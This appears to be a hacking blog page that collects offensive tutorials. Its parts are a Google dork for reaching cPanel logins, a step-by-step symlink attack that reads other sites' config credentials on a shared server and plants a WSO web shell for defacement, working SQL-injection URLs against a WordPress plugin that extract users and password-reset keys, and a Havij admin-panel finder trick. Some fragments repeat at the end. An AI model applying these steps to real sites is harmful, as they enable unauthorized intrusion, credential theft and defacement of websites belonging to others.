This trick is a dork based trick in which we can get into demo cpanels of many webhosting websites like hostgator , hostmonster etc
It is just a simple method but cool ! :D Goto http://www.google.com and enter this dork: inurl:2082/login/?user= you will get lots of results click on it and bingo you are into the demo cpanel !!!
Well symlink stands for symbolic link or can also be called soft-link, and to best describe it for everyone out there it is like a shortcut in windows now to explain in a bit more detail imagine your on your desktop and you create a shortcut to "C:/" this is essentially like creating a symlink from "/home/userx/www/" to "/" please note that a shortcut is not the same as a symlink. as windows does also support symlinking I only use them as a reference as they are similar and help explain it for those who may not understand otherwise.
i am making this tutorial for those who have shelled websites and they cant root server as not all linux boxes can be rooted , also we dont have exploits for all linux kernels.
so here i am gonna show you how to hack websites on a server using symlink , but first u will need a shelled website on that server ,thatn only u can do symlink without shell u cant do symlink.
1.) here is my shelled website
2.)now here i am not gonna tell you to create two folders and then do symlink here i will use automated symlink script which you can download from here and upload on the shelled website. Download Files from here
and this is how it will look and now click on symlink bypass
if it is able to read etc/passwd then u can do symlink on the server but it is not always 100% sure that if it can read /etc pwd then server can be symlinked. now a days hostgator ,hostmonster,blue host ..etc servers are patched to symlink but others are still vulnerable.
3.) now our next step is to find the availbale wordpress and joomla websites on the same server so now we will click on this 4.) for this tut i will be hacking a joomla site so it will look like this these all domains which are under domain column are joomla websites on the server. now as u can see i have my target website of joomla now i will click on config and then i will be redirected to the symlink shotrcut link of the directories of the target website :D. config file contains the username and password of databse of that website.
5.)now copy these username an password from the config page
6.) now in this step you have to upload a database file on ur shelled website download database file from the download link and upload on the webiste and then acess it will look like this now enter that username and passwrd which u just copied from above config page and now login 7.)after login you will see this page now u are in databse of your target website bingo :P 8.)click on tables and then in tables u have to find user,admin table as you can see here
9.) now click on data you will see the admin users data like id,username,password emailsetc now clcik on edit
10.)now you will see username and password hash ..in this you can do two things the best one is replace you password hash with that hash or try to decryt that hash i got the decrypted hash on google so no i will know the admin and password of the website its time to login.
11.)now goto target website login page default adminlogin page for joomla is www.site.com/administrator
12.)Bingo now we hacked a website on that server now its time upload shell and deface. this how we upload shell in jomla goto>tools>template manger> click on any template>edit html now you will see this html code of template to edit.
13.)now paste your shell's source code here in here i will use 404.php WSO pv8 shell which is available for u in download file.
after pasting code click on save
now go to shell directory www.site.com/templates/name_template/index.php here is our shell
14.)now i will enter my password in shell then login to shell bingo website pwned and now u can deface it
this is how you will hack all the website on same server using symlink . website which u can hack joomla wordpress(wp-config)
As requested by few of you i decided to make this small tutorial on how to hack a wordpress site that has an SQLi in plugin. watch this video tutorial for more help:
So lets begin. I will use this 0day by JoinSeventh.
First of all we need to find a vulnerable page. We enter this in Google:
Now we need admin username and email. We need to inject:
Code:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now we have 2 users.
We pick one and copy his email. Go to the login page of the site. It is usually here:
Code:
http://www.site.com/wp-login.php
And press "Lost your password?"
Now you enter either username or email. We can enter both so it doesnt matter. I entered email.
Now when you got:
"Check your e-mail for the confirmation link."
It means that reset key is successfully sent. Now we need to get the activation key.
Go back to the syntax you used for extracting email and username and do this:
Code:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Code:
http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.
What's New?
Multithreading
Oracle Blind injection method.
Automatic all parameter scan added.
New blind injection method (no more ? char.)
Retry for blind injection.
A new method for tables/columns extraction in mssql blind.
A WAF bypass method for mysql blind.
Getting tables and columns even when can not get current database.
Auto save log.
bugfix: url encode bug fixed.
bugfix: trying time based methods when mssql error based and union based fail.
bugfix: clicking get columns would delete all tables.
bugfix: reseting time based method delay when applying settings.
Admin Panel is the place where the admin of the site login and manages the site or data present in the site. If you got the access to the admin panel then you are able to deface or compromise any data of the particular site you have logged in. But now-a-days finding the admin panel is almost difficult. People use online admin finders or Havij for find the admin panels.
So, Today i will tell you how to find the Admin Panels easily with the latest list of admin panels. I have found this way my own but only the way not the List. I will use the Havij for my trick. Normally Havij have 300-500 admin list but in my Latest list there are around 1000+ list .
So, lets begin :-
First of all download the havij and Admin finder latest list
Now after getting the List and the Havij. Install the Havij and open it’s directory that is C:\Program Files\Havij .
Now there You will see the admins.txt document . Note :- You can’t edit the admins.txt in that folder.
Create the new file name admins.txt save it on the desktop remember admins.txt that is created by should have the list of the admin panels that i have given you in the starting.
Delete or cut the admins.txt from the Havij folder and paste yours admins.txt .
Now open Havij click on Find Admin start finding the admin panels by 1000+ list of Admin panel links.
So by this trick we can find the admin panel easily because at the starting we have only 500 but now we have 1000+ list in havij.
THIS WEBSITE IS BUILT BY ME FOR EDUCATIONAL PURPOSE. IF YOU USE THIS INFORMATION TO HARM ANY SUBSTANCE OR COMMUNITY PERSONALLY AND GOT CAUGHT THAN WE ARE NOT RESPONSIBLE, EXPAND YOUR INFORMATION,SHARE UR THOUGHTS AND KNOWLEDGE WITH US. MAIL ME ON RRRICKY.SAINI2@GMAIL.COM
![[Image: cpanel_logo.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uwX24Ht9knUNaYh-QClC2_uiNx43bIICGRjx7kFgWnVxISWfZO8rJUYh2o5UnpKOASfDnnjVL_ZBI9vaj5jiFbxi-NVYy3KBP3fhlhny9ksjUZKvOyh65LPOrXil6JVSCrJw=s0-d)
![[Image: regionby.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_teBQyoa7hZvdZVSsBUmovP8rUkvOSpFeBluMt7lRXB6L2qnXtozGZEeWZuJecWaagipsTk_TyvyM0Rns8L37aG4XZG5UfXqZVNv6_YMDAl1z_N6cg_R4c=s0-d)
![[Image: regionng.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sS9i9PbvSIm2bGXhZuQsh5sMTZdSPOrY5anNCLxaS5E4ZXzsuFffQpImPdqZmPmrzxcLStUEqtiUZWYrQEwh53M9fzEHvyY4fUFzC5wTz_Yt0JkcsZ=s0-d)
but only the way not the List. I will use the Havij for my trick. Normally Havij have 300-500 admin list but in my Latest list there are around 1000+ list 
.
Return to top of page
Copyright © 2011 | Platinum Theme Converted into Blogger Template by devzcyberarena